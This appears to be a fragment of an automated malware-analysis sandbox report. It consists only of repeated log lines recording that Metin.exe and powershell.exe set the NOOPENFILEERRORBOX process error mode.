                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Metin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
